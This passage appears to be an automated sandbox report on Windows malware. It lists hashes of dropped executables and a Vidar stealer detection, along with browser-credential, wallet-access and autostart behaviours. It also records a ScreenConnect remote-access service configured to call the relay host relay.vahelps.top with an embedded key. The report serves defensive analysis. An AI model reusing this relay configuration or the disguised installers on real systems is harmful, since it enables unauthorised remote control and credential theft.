| SHA512 | 69d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-errorhandling-l1-1-0.dll
| MD5 | eb0978a9213e7f6fdd63b2967f02d999 |
| SHA1 | 9833f4134f7ac4766991c918aece900acfbf969f |
| SHA256 | ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e |
| SHA512 | 6f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-debug-l1-1-0.dll
| MD5 | 33bbece432f8da57f17bf2e396ebaa58 |
| SHA1 | 890df2dddfdf3eeccc698312d32407f3e2ec7eb1 |
| SHA256 | 7cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e |
| SHA512 | 619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-datetime-l1-1-0.dll
| MD5 | cfe0c1dfde224ea5fed9bd5ff778a6e0 |
| SHA1 | 5150e7edd1293e29d2e4d6bb68067374b8a07ce6 |
| SHA256 | 0d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e |
| SHA512 | b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-console-l1-1-0.dll
| MD5 | e8b9d74bfd1f6d1cc1d99b24f44da796 |
| SHA1 | a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452 |
| SHA256 | b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59 |
| SHA512 | b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\_ctypes.pyd
| MD5 | 79f339753dc8954b8eb45fe70910937e |
| SHA1 | 3ad1bf9872dc779f32795988eb85c81fe47b3dd4 |
| SHA256 | 35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007 |
| SHA512 | 21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753 |
C:\Users\Admin\AppData\Local\Temp\current_version_DiscordSpotifyBypass.txt
| MD5 | cb5ae17636e975f9bf71ddf5bc542075 |
| SHA1 | 180505679cfe0cca79bae51fdda0296b7cd9c493 |
| SHA256 | 14be4b45f18e0d8c67b4f719b5144eee88497e413709d11d85b096d8e2346310 |
| SHA512 | 957f720b6d516c8e273968c9be2ffbe146329c1a11a2097844206f030dfde1f4efe3379eb68316d1c7426457144d9576dad04e46b10c0ca8d8b9a5d668387a1b |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_decimal.pyd
| MD5 | 1cdd7239fc63b7c8a2e2bc0a08d9ea76 |
| SHA1 | 85ef6f43ba1343b30a223c48442a8b4f5254d5b0 |
| SHA256 | 384993b2b8cfcbf155e63f0ee2383a9f9483de92ab73736ff84590a0c4ca2690 |
| SHA512 | ba4e19e122f83d477cc4be5e0dea184dafba2f438a587dd4f0ef038abd40cb9cdc1986ee69c34bac3af9cf2347bea137feea3b82e02cca1a7720d735cea7acda |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\psutil\_psutil_windows.pyd
| MD5 | 3e579844160de8322d574501a0f91516 |
| SHA1 | c8de193854f7fc94f103bd4ac726246981264508 |
| SHA256 | 95f01ce7e37f6b4b281dbc76e9b88f28a03cb02d41383cc986803275a1cd6333 |
| SHA512 | ee2a026e8e70351d395329c78a07acb1b9440261d2557f639e817a8149ba625173ef196aed3d1c986577d78dc1a7ec9fed759c19346c51511474fe6d235b1817 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\charset_normalizer\md__mypyc.cp310-win_amd64.pyd
| MD5 | 494f5b9adc1cfb7fdb919c9b1af346e1 |
| SHA1 | 4a5fddd47812d19948585390f76d5435c4220e6b |
| SHA256 | ad9bcc0de6815516dfde91bb2e477f8fb5f099d7f5511d0f54b50fa77b721051 |
| SHA512 | 2c0d68da196075ea30d97b5fd853c673e28949df2b6bf005ae72fd8b60a0c036f18103c5de662cac63baaef740b65b4ed2394fcd2e6da4dfcfbeef5b64dab794 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\charset_normalizer\md.cp310-win_amd64.pyd
| MD5 | f33ca57d413e6b5313272fa54dbc8baa |
| SHA1 | 4e0cabe7d38fe8d649a0a497ed18d4d1ca5f4c44 |
| SHA256 | 9b3d70922dcfaeb02812afa9030a40433b9d2b58bcf088781f9ab68a74d20664 |
| SHA512 | f17c06f4202b6edbb66660d68ff938d4f75b411f9fab48636c3575e42abaab6464d66cb57bce7f84e8e2b5755b6ef757a820a50c13dd5f85faa63cd553d3ff32 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\certifi\cacert.pem
| MD5 | 50ea156b773e8803f6c1fe712f746cba |
| SHA1 | 2c68212e96605210eddf740291862bdf59398aef |
| SHA256 | 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47 |
| SHA512 | 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\unicodedata.pyd
| MD5 | a40ff441b1b612b3b9f30f28fa3c680d |
| SHA1 | 42a309992bdbb68004e2b6b60b450e964276a8fc |
| SHA256 | 9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08 |
| SHA512 | 5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_ssl.pyd
| MD5 | 11c5008e0ba2caa8adf7452f0aaafd1e |
| SHA1 | 764b33b749e3da9e716b8a853b63b2f7711fcc7c |
| SHA256 | bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14 |
| SHA512 | fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_socket.pyd
| MD5 | 5dd51579fa9b6a06336854889562bec0 |
| SHA1 | 99c0ed0a15ed450279b01d95b75c162628c9be1d |
| SHA256 | 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c |
| SHA512 | 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_queue.pyd
| MD5 | c9ee37e9f3bffd296ade10a27c7e5b50 |
| SHA1 | b7eee121b2918b6c0997d4889cff13025af4f676 |
| SHA256 | 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a |
| SHA512 | c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_lzma.pyd
| MD5 | 5a77a1e70e054431236adb9e46f40582 |
| SHA1 | be4a8d1618d3ad11cfdb6a366625b37c27f4611a |
| SHA256 | f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e |
| SHA512 | 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_hashlib.pyd
| MD5 | cfb9e0a73a6c9d6d35c2594e52e15234 |
| SHA1 | b86042c96f2ce6d8a239b7d426f298a23df8b3b9 |
| SHA256 | 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6 |
| SHA512 | 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_bz2.pyd
| MD5 | b45e82a398713163216984f2feba88f6 |
| SHA1 | eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839 |
| SHA256 | 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8 |
| SHA512 | b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 8036a5d811a46670fc2d9ed64ec406c9 |
| SHA1 | 4eb265fbe3db4b82431855f85e03951ec51f2c0f |
| SHA256 | e6f2de7acb31fba46cd82dad80f7e2a76bf19a661959928a329823f7a4a9a53a |
| SHA512 | a852a2b0c6f03abee03c298e81f5880bfa7c772bddeb212a0475834e03b0f1e606daac0a1b6a0c887dfba1c44e2bab272e182ed99321348da1ef601d29e65d50 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | c9fbeaf71d2bc92e74529a3ff6e031b0 |
| SHA1 | 0bbf4957ed2bd4d99d3cea7d8be771cfa13c2d01 |
| SHA256 | 907ba3f9f59c0adc50673d3875d33b15b9b17a8a5b7749202fda496bf9845159 |
| SHA512 | 6da682b206b91848b09068a16928ecb4f0d1d5946c5cf7a969db1f880cf169f58427d557a4d10bbe6c7fd409e9d2b06d2ceeebfd7a56ee5a52eb522b22f043d6 |
C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe
| MD5 | 8123d15bb6100a19ac103b4ec3d592bf |
| SHA1 | 713d2344beb28d34864768e7b2c0463044bdc014 |
| SHA256 | 68e92585378abdd8a5e6ba42c20a66558ebbcc964c08ba3ce56d020568ebf16d |
| SHA512 | ca048fc1aa53af7b517c2b894e038ed7e413690f2a9e9838c0a5624f9530b20ec8ca22c8d99b8b7ed1e049753970880ee047de984557e2e6c28a55ba2c974351 |
memory/5504-3707-0x0000000000B80000-0x0000000000B92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
| MD5 | a6fed209276015af14b2f088d52282af |
| SHA1 | 7ee00d72c43b4f6720340637b2773e88664a1b70 |
| SHA256 | c7ddec717bda7e1ef135d2815a795df62157cd14f1ac45c44c91868ae72c80d4 |
| SHA512 | b7f0d9279c556e58063ee768c078fec87993596463f5006fd7510527a49b3d598584ebaf6d9894340313d46961cbfbb09a0c7ed9c86c5d7348a791d4f5817f9a |
C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe
| MD5 | ab95efbeb890f50d89b56a14f2c0bbd1 |
| SHA1 | a90b055e0cfafb31b75bb2be8cac9a07f1c06088 |
| SHA256 | e473233c71a8855f9d52fe131830b56d0b5ea9b6eeb0e2d5528cbef29360668f |
| SHA512 | b553e90455a4ad9f3e64d9b08ac4a71d99eb2386cd1ec2e2937fe52317c5e6de3794c471a52d1bd400e01277583807563b630cfbcb4ad2792111847eaa81f919 |
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
| MD5 | feaca07182c6be327551ba4402a338c7 |
| SHA1 | 5c699eb735def4473b9b02de282ccead84af1061 |
| SHA256 | 26e9813dd9d80e2b2441d799608214697d7262e24c739bcc11563756c22d3efc |
| SHA512 | 0ada77bc81af9b5d865f06cd6f91457281bdebbf07183367b7d3d0bd598ad7d3ce081b0d1f0741efbbe6c3839620bb17b637ff9727cb3440d5b96b3eab70dda1 |
C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Installer\setup.exe
| MD5 | 1b3e9c59f9c7a134ec630ada1eb76a39 |
| SHA1 | a7e831d392e99f3d37847dcc561dd2e017065439 |
| SHA256 | ce78ccfb0c9cdb06ea61116bc57e50690650b6b5cf37c1aebfb30c19458ee4ae |
| SHA512 | c0e50410dc92d80ff7bc854907774fc551564e078a8d38ca6421f15cea50282c25efac4f357b52b066c4371f9b8d4900fa8122dd80ab06ecbd851c6e049f7a3e |
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\SETUP.EX_
| MD5 | 1a59a8af3c58b30ff0fe71db2196b24b |
| SHA1 | 6b0e5ba36f4fc5328ec494272054a50cafa13e68 |
| SHA256 | ba25974b29a25cb7bc1f58a0990a8ce758354aa6ec5b8b8af210f2c1466ba49d |
| SHA512 | f173fe15db8d7aeef4f6fa62a41246550ccee207e6388095a5f87036362d4c95da646e1a7c68764054556e024da80b749646425076e9bfac42fb77be8f2c0355 |
C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe
| MD5 | 30a39343008efbab70b632c274e6f7e2 |
| SHA1 | 566b9693a3aa39b17f34c02cffdf906e64778932 |
| SHA256 | 5d1a98b024843417664b60641064995335e2ea31220124723908f59e926dab06 |
| SHA512 | 1d4047fed9c6a48840a587fe2a4586a34e00f03dc64ae31e0c2345f52283205fc9165d6ec15d6e6c81032a5948065ba6047f4785c5a0666aea1fe417202084f3 |
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
| MD5 | f48972736d07992d0cfd2b8bc7972e27 |
| SHA1 | 017d47686c76c1846da04992909214651972905f |
| SHA256 | 56d97e9f42ee5b7efdbfcd7d56da50e752fb08599f3422ee0cc9b697a92e56da |
| SHA512 | 1bac6e0f66104bd66505647c845b4b2eac918fb5986004325417dc3f9bcb20be39965bbca6781244e009966b49ea2e78989ca69a5c49f26c656fc8c0399ba345 |
C:\Users\Admin\AppData\Local\Temp\Files\VPN-Installer.exe
| MD5 | ec2890a2d11d0b67f873821d6b83fca3 |
| SHA1 | 8e21eee3a1b154a3f2ca55f2075b3c33dce7a294 |
| SHA256 | 3d7e660d66413479c2addd32a9e96691452b5d3cac5c5e9ef487bd18ad48739f |
| SHA512 | 2f18ab9c642b6aa13a39a2223980d544e2a549ae3feeaa09a61cea3a5812a81ac504c883b97947d9c84574788b182c0aa899e9524711f91692b714c47ab20197 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-14 01:10
Reported
2025-02-14 01:55
Platform
win11-20250210-en
Max time kernel
1800s
Max time network
1801s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e9736d81e38965d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (e9736d81e38965d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FREE_VPN\"" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
